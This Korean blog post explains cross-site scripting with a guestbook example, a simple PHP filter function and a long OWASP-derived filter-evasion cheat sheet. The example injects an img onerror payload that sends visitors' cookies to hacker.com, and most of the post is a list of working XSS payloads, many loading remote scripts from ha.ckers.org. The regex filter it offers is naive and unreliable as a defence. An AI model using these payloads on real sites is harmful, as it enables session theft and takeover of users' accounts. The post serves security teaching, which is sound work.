1. 크로스사이트스크립트(XSS)
크로스 사이트 스크립팅(영문 명칭 cross-site scripting, 영문 약어 XSS)은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점이다. 주로 여러 사용자가 보게 되는 전자 게시판에 악성 스크립트가 담긴 글을 올리는 형태로 이루어진다. 이 취약점은 웹 애플리케이션이 사용자로부터 입력 받은 값을 제대로 검사하지 않고 사용할 경우 나타난다. 이 취약점으로 해커가 사용자의 정보(쿠키, 세션 등)를 탈취하거나, 자동으로 비정상적인 기능을 수행하게 하거나 할 수 있다. 주로 다른 웹사이트와 정보를 교환하는 식으로 작동하므로 사이트 간 스크립팅이라고 한다.
- 입력값 검증을 적절히 수행하지 않을 경우 발생
- 다른 웹 해킹 기법과 달리 웹 사이트 자체가 아니라 접속하는 사용자를 대상으로 하는 기법
- 대상이 디는 사용자 웹 브라우저에서 임의의 HTML 태그 혹은 JavaScript, VBScript를 실행
2. 예문
다음과 같이 사용자가 입력한 내용을 출력하는 방명록 프로그램이 있다고 하자.
1 2 | <p><?php echo htmlspecialchars($name); ?>님의 말: </p> <?php echo $content; ?> | by zulloper |
만약 $name이 "Hacker"이고 $content가 다음과 같다고 하자.
1 2 3 | <p>Hello! I am a hacker.</p> <img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?cookie='+encodeURIComponent(document.cookie);" /> | by zulloper |
그러면 다음과 같이 출력될 것이다.
1 2 3 4 | <p>Hacker님의 말: </p> <p>Hello! I am a hacker.</p> <img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?cookie='+encodeURIComponent(document.cookie);" /> | by zulloper |
결과적으로 방명록을 보는 사람의 쿠키가 해커에게 전송이 될 것이다.
3. 참고
간단한 PHP용 HTML 필터링함수
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | <? function html_filter($content) { // Strip bad elements. $content = preg_replace('/(<)(|\/)(\!|\?|html|head|title|meta|body|style|link|base|script'. '|frameset|frame|noframes|iframe|applet|embed|object|param|noscript|noembed|map|area|basefont|xmp|plaintext|comment)/i', '<$2$3', $content); // Strip script handlers. $content = preg_replace_callback("/([^a-z])(o)(n)/i", create_function('$matches', 'if($matches[2]=="o") $matches[2] = "o"; else $matches[2] = "O"; return $matches[1].$matches[2].$matches[3];'), $content); return $content; } ?> by zulloper |
4. Cheat Sheet
1) <img> tags
입력값 |
설명 |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
No Filter Evasion |
<IMG SRC="javascript:alert('XSS');"> |
Image XSS using the JavaScript directive |
<IMG SRC=javascript:alert('XSS')> |
No quotes and no semicolon |
<IMG SRC=JaVaScRiPt:alert('XSS')> |
Case insensitive XSS attack vector |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
Malformed IMG tags |
<IMG SRC=# onmouseover="alert('xxs')"> |
Default SRC tag to get past filters |
<IMG SRC= onmouseover="alert('xxs')"> |
Default SRC tag by leaving it empty |
<IMG onmouseover="alert('xxs')"> |
Default SRC tag by leaving it out entirely |
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> |
On error alert |
| <img src=x onerror="javas cript:a lert('X SS')"> | IMG onerror and javascript alert encode |
| <IMG SRC=javasc ript:al ert('XS S')> | Decimal HTML character references without trailing semicolons |
| <IMG SRC=javascript: alert('XSS')> | Hexadecimal HTML character references without trailing semicolons |
| <IMG SRC="jav ascript:alert('XSS');"> | Embedded tab |
| <IMG SRC="jav	ascript:alert('XSS');"> | Embedded Encoded tab |
| <IMG SRC="jav
ascript:alert('XSS');"> | Embedded newline to break up XSS |
| perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | Null breaks up JavaScript directive |
| <IMG SRC="  javascript:alert('XSS');"> | Spaces and meta chars before the JavaScript |
| <IMG SRC="javascript:alert('XSS')" | Half open HTML/JavaScript XSS vector |
| <IMG DYNSRC="javascript:alert('XSS')"> | IMG Dynsrc |
| <IMG LOWSRC="javascript:alert('XSS')"> | IMG lowsrc |
| <IMG SRC='vbscript:msgbox("XSS")'> | VBscript in an image |
| <IMG SRC="livescript:[code]"> | Livescript (older versions of Netscape only) |
| <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | IMG Embedded commands |
2) <styles> tags
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
STYLE sheet |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
Remote style sheet |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
Remote style sheet part 2 |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> |
Remote style sheet part 3 |
| <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | Remote style sheet part 4 |
| <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | STYLE tags with broken up JavaScript for XSS |
| <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | STYLE attribute using a comment to break up expression |
| exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | IMG STYLE with expression |
| <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | STYLE tag (Older versions of Netscape only) |
| <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | STYLE tag using background-image |
| <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | STYLE tag using background |
| <XSS STYLE="xss:expression(alert('XSS'))"> | Anonymous HTML with STYLE attribute |
| <XSS STYLE="behavior: url(xss.htc);"> | Local htc file |
3) <div> tags
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
DIV |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a |
DIV background-image with unicoded XSS exploit |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
DIV background-image plus extra characters |
<DIV STYLE="width: expression(alert('XSS'));"> |
DIV expression |
4) <iframe> tags, <table> tags
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
IFRAME |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
IFRAME Event based |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
FRAME |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
TABLE |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
TD |
5) <meta> tags
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
META |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> |
META using data |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
META with additional URL parameter |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
IMG Embedded commands part II |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
Cookie manipulation |
6) ETC.
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
Non-alpha-non-digit XSS |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
|
<<SCRIPT>alert("XSS");//<</SCRIPT> |
Extraneous open brackets |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
No closing script tags |
<SCRIPT SRC=//ha.ckers.org/.j> |
Protocol resolution in script tags |
<iframe src=http://ha.ckers.org/scriptlet.html < |
Double open angle brackets |
\";alert('XSS');// |
Escaping JavaScript escapes |
</script><script>alert('XSS');</script> |
|
| </TITLE><SCRIPT>alert("XSS");</SCRIPT> | End title tag |
| <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | INPUT image |
| <BODY BACKGROUND="javascript:alert('XSS')"> | BODY image |
| <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE> <UL><LI>XSS</br> | List-style-image |
| <svg/onload=alert('XSS')> | SVG object tag |
| <BODY ONLOAD=alert('XSS')> | BODY tag |
| <BGSOUND SRC="javascript:alert('XSS');"> | BGSOUND |
| <BR SIZE="&{alert('XSS')}"> | & JavaScript includes |
| ¼script¾alert(¢XSS¢)¼/script¾ | US-ASCII encoding |
| <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> | Downlevel-Hidden block |
| <BASE HREF="javascript:alert('XSS');//"> | BASE tag |
| <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | OBJECT tag |
| a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); | Using ActionScript inside flash can obfuscate your XSS vector |
| <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"> </B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> </SPAN> | XML data island with CDATA obfuscation |
| <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | Locally hosted XML with embedded JavaScript that is generated using an XML data island |
| <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS <SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> | HTML+TIME in XML |
| <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | Assuming you can only fit in a few characters and it filters against ".js" |
| <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | SSI (Server Side Includes) |
| <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS'); +ADw-/SCRIPT+AD4- | UTF-7 encoding |
| <SCRIPT a=">" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | XSS using HTML quote encapsulation |
| <SCRIPT =">" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">" '' SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT "a='>'" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=`>` SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT a=">'>" SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://ha.ckers.org/xss.js"></SCRIPT> | |
| <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | You can EMBED SVG which can contain your XSS vector |
7) Character escape sequences
본 게시물은 위키피디아와 OWASP 내용을 바탕으로 작성하였습니다.
'Web Hacking' 카테고리의 다른 글
| Blind SQL Injection을 이용하여 한글가져오기! (0) | 2017.06.26 |
|---|---|
| Oracle SQL Injection (0) | 2016.03.04 |
| MS SQL Injection (0) | 2016.02.25 |